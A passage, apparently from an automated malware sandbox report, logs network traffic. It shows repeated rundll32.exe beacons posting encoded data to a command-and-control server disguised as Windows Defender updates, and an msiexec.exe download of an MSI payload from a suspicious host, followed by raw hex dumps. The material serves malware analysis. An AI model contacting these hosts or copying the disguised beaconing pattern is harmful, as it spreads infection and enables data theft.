                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:29.766406059 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:29 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.449906185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:30.041013956 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:31.503984928 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:31 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.449910185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:31.768332005 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:33.298293114 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:32 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.449912185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:33.562880039 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:35.027105093 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:34 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              51192.168.2.449917185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:35.294671059 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:36.738509893 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:36 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              52192.168.2.449922185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:36.998045921 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:41.590828896 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:38 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.2.449932185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:41.857400894 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:43.296139956 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:42 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              54192.168.2.449939185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:43.558464050 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:45.104841948 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:44 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449730104.21.40.34437164C:\Windows\System32\msiexec.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-06 21:19:36 UTC115OUTGET /klog.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              User-Agent: Windows Installer
                                              Host: axizlhop.life
                                              2024-12-06 21:19:37 UTC802INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:19:37 GMT
                                              Content-Type: application/x-msi
                                              Content-Length: 978944
                                              Connection: close
                                              X-Powered-By: PHP/8.1.29
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BX8GxNTOjoegMhWHRlCnW2sl0Qmutt1qltoEF%2BT8ruiFRe7X4CRI5Q%2BY%2BwiCHnB5jZEm%2FfV1dugez%2BtExK2cMlyTcgglUD3oOCg0iYzRGAvPradM8eJIWqawX0SjrnJY"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8edf50b10e2c4223-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1744&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=729&delivery_rate=1627647&cwnd=205&unsent_bytes=0&cid=55f72400780380a0&ts=566&x=0"
                                              2024-12-06 21:19:37 UTC567INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 0f 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 03 00 00 00 05 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 44 00 00 00 ce 00 00 00 60 01 00 00 c1 01 00 00 15 02 00 00 16 02 00 00 17 02 00 00 18 02 00 00 19 02 00 00 1a 02 00 00 1b 02 00 00 08 00 00 00 2f 06 00 00 30 06 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                              Data Ascii: >D`/0
                                              2024-12-06 21:19:37 UTC1369INData Raw: 00 0f 00 00 00 10 00 00 00 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00 15 00 00 00 16 00 00 00 17 00 00 00 18 00 00 00 19 00 00 00 1a 00 00 00 1b 00 00 00 1c 00 00 00 1d 00 00 00 1e 00 00 00 1f 00 00 00 20 00 00 00 2b 00 00 00 22 00 00 00 23 00 00 00 24 00 00 00 25 00 00 00 26 00 00 00 27 00 00 00 28 00 00 00 29 00 00 00 2a 00 00 00 31 00 00 00 2c 00 00 00 2d 00 00 00 2e 00 00 00 2f 00 00 00 30 00 00 00 34 00 00 00 32 00 00 00 3a 00 00 00 3f 00 00 00 35 00 00 00 36 00 00 00 37 00 00 00 38 00 00 00 39 00 00 00 3e 00 00 00 3c 00 00 00 b8 01 00 00 3d 00 00 00 a1 01 00 00 8d 05 00 00 40 00 00 00 41 00 00 00 42 00 00 00 43 00 00 00 8b 05 00 00 fd ff ff ff 46 00 00 00 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 4b 00 00 00 4c 00 00 00 4d 00 00 00 4e 00
                                              Data Ascii: +"#$%&'()*1,-./042:?56789><=@ABCFGHIJKLMN
                                              2024-12-06 21:19:37 UTC455INData Raw: f1 45 36 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 02 01 11 00 00 00 0d 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 17 00 00 00 0c 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 06 00 00 00 07 00 00 00 08 00 00 00 09 00 00 00 0a 00 00 00 0b 00 00 00 0c 00 00 00 0d 00 00 00 0e 00 00 00 0f 00 00 00 10 00 00 00 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00 15 00 00 00 fe ff ff ff 18 00 00 00 fe ff ff ff fe ff ff ff e8 01 00 00 1b 00 00 00 1c 00 00 00 1d 00 00 00 1e 00 00 00 1f 00 00 00 20 00 00 00 21 00 00 00 62 00 00 00 23 00 00 00 24 00 00
                                              Data Ascii: E6H !b#$
                                              2024-12-06 21:19:37 UTC1369INData Raw: 00 57 00 00 00 58 00 00 00 59 00 00 00 5a 00 00 00 5b 00 00 00 5c 00 00 00 5d 00 00 00 5e 00 00 00 5f 00 00 00 60 00 00 00 61 00 00 00 fe ff ff ff 64 00 00 00 fe ff ff ff 66 00 00 00 fe ff ff ff 67 00 00 00 68 00 00 00 69 00 00 00 6a 00 00 00 6b 00 00 00 6c 00 00 00 6d 00 00 00 6e 00 00 00 6f 00 00 00 70 00 00 00 71 00 00 00 78 00 00 00 73 00 00 00 74 00 00 00 75 00 00 00 76 00 00 00 77 00 00 00 fe ff ff ff 79 00 00 00 7a 00 00 00 7b 00 00 00 7c 00 00 00 7d 00 00 00 7e 00 00 00 7f 00 00 00 80 00 00 00 04 00 04 00 04 00 04 00 04 00 04 00 07 00 07 00 07 00 11 00 11 00 11 00 1b 00 1b 00 20 00 20 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 31 00 31 00 31 00 35 00 35 00 35 00 3a 00 3a 00 3a 00 3c 00 3c 00 3c 00 3c 00 3c 00 41 00 41 00 43 00
                                              Data Ascii: WXYZ[\]^_`adfghijklmnopqxstuvwyz{|}~ ''''''''''111555:::<<<<<AAC
                                              2024-12-06 21:19:37 UTC1369INData Raw: 32 9d 48 ad 00 8f 02 a5 00 9d 26 ad 26 9d 40 9f ff 9f 02 95 02 85 48 9d 02 85 48 ad 48 9d ff 8f 48 ad 32 ad 32 ad 32 8d 48 ad 00 9d 48 ad 32 ad 32 ad 00 ad 48 ad 32 ad 32 ad ff ad 00 bd 02 95 48 ad 48 ad 48 ad 02 85 48 9d 00 9d 04 91 48 ad 00 9d 02 95 48 ad 00 9d 02 95 00 ad ff 8f 48 ad 02 a5 ff 8d ff 9f 48 ad 02 a5 ff 8d ff 9f 48 9d 48 ad 02 a5 00 8d 02 85 02 85 02 85 02 85 00 9f 32 9f 48 ad 02 85 ff 8f ff 9f 00 9f 48 8d 48 ad ff 9d 26 ad 14 bd 14 bd ff bd 04 a1 ff 9d 48 8d 2b 00 2c 00 2d 00 2e 00 2f 00 30 00 06 00 07 00 08 00 06 00 30 00 64 00 06 00 07 00 08 00 3c 00 85 00 3d 00 7d 00 0c 01 0d 00 75 00 43 00 22 00 04 00 07 00 11 00 1b 00 20 00 27 00 31 00 35 00 3a 00 3c 00 41 00 43 00 46 00 49 00 4a 00 4f 00 56 00 58 00 5a 00 62 00 66 00 68 00 6b 00 72
                                              Data Ascii: 2H&&@HHHH222HH22H22HHHHHHHHHH2HHH&H+,-./00d<=}uC" '15:<ACFIJOVXZbfhkr
                                              2024-12-06 21:19:37 UTC1369INData Raw: 73 50 61 74 63 68 53 69 7a 65 46 69 6c 65 5f 50 61 74 63 68 54 79 70 65 41 63 74 69 6f 6e 43 6f 6e 64 69 74 69 6f 6e 53 65 71 75 65 6e 63 65 43 6f 73 74 46 69 6e 61 6c 69 7a 65 43 6f 73 74 49 6e 69 74 69 61 6c 69 7a 65 54 61 62 6c 65 4e 61 6d 65 49 6e 73 74 61 6c 6c 46 69 6e 61 6c 69 7a 65 49 6e 73 74 61 6c 6c 49 6e 69 74 69 61 6c 69 7a 65 49 6e 73 74 61 6c 6c 56 61 6c 69 64 61 74 65 41 64 76 74 45 78 65 63 75 74 65 53 65 71 75 65 6e 63 65 43 72 65 61 74 65 53 68 6f 72 74 63 75 74 73 4d 73 69 50 75 62 6c 69 73 68 41 73 73 65 6d 62 6c 69 65 73 50 75 62 6c 69 73 68 43 6f 6d 70 6f 6e 65 6e 74 73 50 75 62 6c 69 73 68 46 65 61 74 75 72 65 73 50 75 62 6c 69 73 68 50 72 6f 64 75 63 74 52 65 67 69 73 74 65 72 43 6c 61 73 73 49 6e 66 6f 52 65 67 69 73 74 65 72 45
                                              Data Ascii: sPatchSizeFile_PatchTypeActionConditionSequenceCostFinalizeCostInitializeTableNameInstallFinalizeInstallInitializeInstallValidateAdvtExecuteSequenceCreateShortcutsMsiPublishAssembliesPublishComponentsPublishFeaturesPublishProductRegisterClassInfoRegisterE
